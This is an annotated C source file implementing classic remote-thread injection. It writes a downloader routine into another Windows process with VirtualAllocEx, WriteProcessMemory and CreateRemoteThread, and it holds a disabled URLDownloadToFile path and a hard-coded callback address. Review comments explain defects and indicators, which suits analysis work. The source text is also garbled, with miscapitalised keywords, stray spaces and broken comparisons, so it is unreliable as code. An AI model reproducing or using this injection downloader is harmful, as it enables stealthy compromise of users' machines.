# Include <windows. h>
# Include <Winsock. h>
# Define maxinjectsize (2048*7)
/*
 * tagdowninfo: the parameter block that hidedownfile() fills in, copies into
 * the target process (second writeprocessmemory call below) and hands to the
 * remote thread as its lpvoid argument.  Everything threaddown() needs - the
 * four kernel32 entry points and every library/export name it resolves -
 * travels inside this struct, because the copied routine contains no imports
 * and no string literals of its own.  Layout must therefore match exactly
 * between the writer (this process) and the reader (the remote thread).
 */
Struct tagdowninfo
{
Wsadata v_wsadata;                 /* written by the WSAStartup call in threaddown */
Socket v_sock;                     /* never assigned in the visible code */
Struct sockaddr_in v_target;       /* set to 192.168.1.123:999 by hidedownfile; threaddown never reads it */
Tchar v_buf [256];                 /* unused in the visible code */
Tchar v_sendbuf [256];             /* unused in the visible code */
Int v_rcvid;                       /* unused in the visible code */
Word v_versionrequeste;            /* Winsock version passed to WSAStartup (2.2) */
Tchar v_ws2_32_lib [20];           /* "ws2_32.dll" - library name for LoadLibraryA */
Tchar szwsastartup [500];          /* "wsastartup" - export name for GetProcAddress */
/* Winsock function slots - none of these are assigned or used in the visible code */
Int v_wsastartup;
Socket v_socket;
Int v_connect;
Tchar szgetlasterror [20];         /* unused in the visible code */
Tchar szurl [500];                 /* download URL; only passed as MessageBox text in threaddown */
Tchar szfile [500];                /* local file path; only passed as MessageBox text/caption in threaddown */
Tchar szurlmon [30];               /* "urlmon.dll" - used only by the commented-out download path */
Tchar szurldowndtofile [30];       /* "urldownloadtofilea" - used only by the commented-out download path */
Tchar szmessagebox [500];          /* "messageboxa" - export name; also reused as MessageBox text in a commented-out line */
Tchar szuser32_lib [30];           /* "user32.dll" */
Bool bisrun;                       /* unused in the visible code */
DWORD dwrunmode;                   /* unused in the visible code */
/* Addresses resolved in the injecting process; valid in the target only if
 * kernel32.dll is mapped at the same base there (same-bitness processes in
 * one boot session - NOTE(review): not checked anywhere). */
Farproc funfungetmodulehandleaddr;
Farproc funfungetprocaddressaddr;
Farproc funfunloadlibraryaddr;
Farproc funfungetlasterroraddr;
};
Bool hidedownfile (tagdowninfo * pinfo, DWORD dwprocessid );
/*
 * threaddown: the routine whose machine code hidedownfile() copies byte-for-
 * byte into another process and starts with createremotethread.  It runs in
 * the TARGET process, so it must not touch anything that lives at an address
 * in this module: it makes no direct API calls and uses no string literals,
 * taking every address and name from the tagdowninfo block passed as lparam.
 * NOTE(review): any edit that introduces a literal, a CRT call, a direct
 * import or a relocation silently breaks the copied code; that is why the
 * body is annotated rather than restyled.
 *
 * What the visible body actually does: LoadLibraryA("user32.dll"), resolve
 * MessageBoxA, LoadLibraryA("ws2_32.dll"), resolve WSAStartup, call it, and
 * return.  No socket is created, v_target is never used, and the
 * URLDownloadToFile path is commented out - so despite the names this stub
 * does not download anything as written.
 *
 * lparam: tagdowninfo* in the target process's address space.
 * Returns 0 on every path; nothing is reported back to the injector.
 */
DWORD winapi threaddown (lpvoid lparam)
{
Tagdowninfo * pinfo = (tagdowninfo *) lparam;
// Function-pointer prototypes for the APIs reached through pinfo.
// WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
Typedef int (_ stdcall * t_wsastartup) (word, lpwsadata );
// NOTE(review): the return types below are not the real ones - GetLastError
// returns DWORD and GetProcAddress returns FARPROC, not hmodule.  On 32-bit
// Windows the widths coincide so the casts happen to work; treat as a defect.
Typedef long (_ stdcall * t_messagebox) (hwnd, lpctstr, lpctstr, DWORD );
Typedef long (_ stdcall * t_urldownloadtofile) (lpvoid, lpctstr, lpctstr, DWORD, lpvoid );
Typedef hmodule (_ stdcall * t_getlasterror) (void );
Typedef hmodule (_ stdcall * t_getprocaddress) (hmodule, lpcstr );
Typedef hmodule (_ stdcall * t_getmodulehandle) (lpctstr );
Typedef hmodule (_ stdcall * t_loadlibrary) (lpctstr );
Typedef void (_ stdcall * psleep) (DWORD dwmilliseconds );   // declared but never used
// The four kernel32 entry points resolved by the injector (see hidedownfile).
// pgetmodulehandle and pgetlasterror are assigned but never called here.
T_getmodulehandle pgetmodulehandle = (t_getmodulehandle) pinfo-> funfungetmodulehandleaddr;
T_getprocaddress pgetprocaddress = (t_getprocaddress) pinfo-> funfungetprocaddressaddr;
T_loadlibrary ploadlibrary = (t_loadlibrary) pinfo-> funfunloadlibraryaddr;
T_getlasterror pgetlasterror = (t_getlasterror) pinfo-> funfungetlasterroraddr;
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
// Resolve MessageBoxA from user32.dll; it is used below only as an error
// indicator (there is no other channel back to the injector).
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
Hmodule huser32dll = ploadlibrary (pinfo-> szuser32_lib );
If (! Huser32dll)
{
// The two commented-out lines would have called GetProcAddress on the NULL
// handle just tested for; leaving them disabled is the correct choice.
// T_messagebox pmessagebox = (t_messagebox) pgetprocaddress (huser32dll, pinfo-> szmessagebox );
// Pmessagebox (null, pinfo-> szmessagebox, pinfo-> szfile, 0 );
Return 0;
}
// NOTE(review): pmessagebox is not NULL-checked before the calls at the two
// failure branches below; a failed lookup would call through a null pointer.
T_messagebox pmessagebox = (t_messagebox) pgetprocaddress (huser32dll, pinfo-> szmessagebox );
// Pmessagebox (null, pinfo-> szurl, pinfo-> szfile, 0 );
// Disabled download path: LoadLibraryA("urlmon.dll"), resolve
// URLDownloadToFileA, fetch szurl into szfile.  This is the capability the
// routine is named for; as shipped it is inert.
// Hmodule hdll = ploadlibrary (pinfo-> szurlmon );
// T_urldownloadtofile purldownloadtofile = (t_urldownloadtofile) pgetprocaddress (hdll, pinfo-> szurldowndtofile );
// Purldownloadtofile (null, pinfo-> szurl, pinfo-> szfile, 0, null );
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
// Load ws2_32.dll in the target and resolve WSAStartup.
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
Hmodule socklib = ploadlibrary (pinfo-> v_ws2_32_lib );
If (! Socklib)
{
// Error indicator: szfile is shown as both text and caption.
Pmessagebox (null, pinfo-> szfile, pinfo-> szfile, 0 );
Return 0;
}
T_wsastartup pwsastartup = (t_wsastartup) pgetprocaddress (socklib, pinfo-> szwsastartup );
If (! Pwsastartup)
{
// Error indicator: szurl as text, szfile as caption.
Pmessagebox (null, pinfo-> szurl, pinfo-> szfile, 0 );
Return 0;
}
// Initialise Winsock 2.2 inside the target.  The return value is ignored and
// no matching WSACleanup is ever issued; v_target/v_sock are never used, so
// the routine ends here without opening any connection.
Pwsastartup (pinfo-> v_versionrequeste, & pinfo-> v_wsadata );
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
Return 0;
}
/*
 * hidedownfile: classic remote-thread code injection.  Opens the process
 * dwprocessid, allocates two RWX regions in it, copies the raw bytes of
 * threaddown() and the filled-in tagdowninfo block over, starts
 * threaddown at the copied address with createremotethread, waits for it
 * to finish and frees the regions.
 *
 * From a defender's view this is the textbook pattern - OpenProcess with
 * PROCESS_VM_WRITE|PROCESS_CREATE_THREAD, VirtualAllocEx(PAGE_EXECUTE_
 * READWRITE), WriteProcessMemory, CreateRemoteThread - and the hard-coded
 * 192.168.1.123:999 and the "urldownloadtofilea" string are the IOCs.
 *
 * pinfo:       caller-supplied parameter block; szurl/szfile are expected to
 *              be set by the caller, every other field is filled here.
 * dwprocessid: PID of the target process.
 * Returns true only if the remote thread was created; false on OpenProcess,
 * allocation, write or thread-creation failure.
 *
 * NOTE(review): all strings below appear to carry stray trailing spaces
 * ("kernel32.dll ", "urlmon. dll ") - most likely extraction damage, but as
 * written those lookups would fail.
 */
Bool hidedownfile (tagdowninfo * pinfo, DWORD dwprocessid)
{
// Minimum rights for the injection; fails (false) if the target is
// protected or the caller lacks the privilege.
Handle hprocess = OpenProcess (process_create_thread | process_vm_operation | process_vm_write, false, dwprocessid );
If (hprocess = NULL)
Return false;
// Resolve the four kernel32 exports in THIS process and pass the raw
// addresses across.  Only valid if kernel32 sits at the same base in the
// target - true for same-bitness processes within one boot session, never
// true across 32/64-bit.  The narrow "A" variants are used deliberately so
// the plain-char strings in the struct match.
Hinstance hlibdll = getmodulehandle ("kernel32.dll ");
Pinfo-> funfungetprocaddressaddr = (farproc) getprocaddress (hlibdll, "getprocaddress ");
Pinfo-> funfungetmodulehandleaddr = (farproc) getprocaddress (hlibdll, "getmodulehandlea ");
Pinfo-> funfunloadlibraryaddr = (farproc) getprocaddress (hlibdll, "loadlibrarya ");
Pinfo-> funfungetlasterroraddr = (farproc) getprocaddress (hlibdll, "getlasterror ");
// Library and export names the remote thread will look up.  They are copied
// into the struct (not referenced as literals) because the injected code
// cannot reach this module's read-only data.
Lstrcpy (pinfo-> szurlmon, "urlmon. dll ");
Lstrcpy (pinfo-> szurldowndtofile, "urldownloadtofilea ");
Lstrcpy (pinfo-> szmessagebox, "messageboxa ");
Lstrcpy (pinfo-> szuser32_lib, "user32.dll ");
//************************************** ******************//
Lstrcpy (pinfo-> v_ws2_32_lib, "ws2_32.dll ");
Lstrcpy (pinfo-> szwsastartup, "wsastartup ");
Pinfo-> v_versionrequeste = makeword (2, 2 );
// Hard-coded callback endpoint.  threaddown never reads v_target in the
// visible code, so this is dead configuration - but it is the clearest
// indicator of intent in the file.
Pinfo-> v_target.sin_family = af_inet;
Pinfo-> v_target.sin_port = htons (999 );
Pinfo-> v_target.sin_addr.s_addr = inet_addr ("192.168.1.123 ");
// Prepare the parameters before the socket. Over //
//************************************** ******************//
// Remote allocations.  Both are RWX; the data block does not need to be
// executable.  NOTE(review): every early return from here on leaks hprocess
// and whatever has already been allocated in the target.
Void * premotethread = virtualallocex (hprocess, 0, maxinjectsize, mem_commit, page_execute_readwrite );
If (! Premotethread)
Return false;
Tagdowninfo * pdata = (tagdowninfo *) virtualallocex (hprocess, 0, sizeof (tagdowninfo), mem_commit, page_execute_readwrite );
If (! Pdata)
Return false;
// Copies maxinjectsize (2048*7) bytes starting at &threaddown.  The
// function's real size is not computed, so this over-reads past its end
// into whatever the linker placed next; with incremental linking
// &threaddown may also be a jump thunk rather than the body - TODO confirm.
If (! Writeprocessmemory (hprocess, premotethread, & threaddown, maxinjectsize, 0 ))
Return false;
If (! Writeprocessmemory (hprocess, pdata, pinfo, sizeof (tagdowninfo), 0 ))
Return false;
Bool Bret = true;
// Start threaddown in the target with the remote copy of the struct.
Handle hthread = createremotethread (hprocess, null, 0, (lpthread_start_routine) premotethread, pdata, 0, null );
If (! Hthread)
Bret = false;
// NOTE(review): executed even when hthread is NULL (the wait then fails at
// once), and the regions are released while the thread may still be using
// them only because the wait is INFINITE.
Waitforsingleobject (hthread, infinite );
// NOTE(review): per the VirtualFreeEx contract MEM_RELEASE requires a size
// of 0; a non-zero size makes both calls fail, so the remote RWX regions
// are left mapped in the target.  Return values are not checked.
Virtualfreeex (hprocess, premotethread, maxinjectsize, mem_release );
Virtualfreeex (hprocess, pdata, sizeof (tagdowninfo), mem_release );
// Original author's note: the code to execute the downloaded program from
// another thread (i.e. additionally loading shell32.dll) was meant to go here.
Closehandle (hthread );    // called with NULL when thread creation failed
Closehandle (hprocess );
Return Bret;
}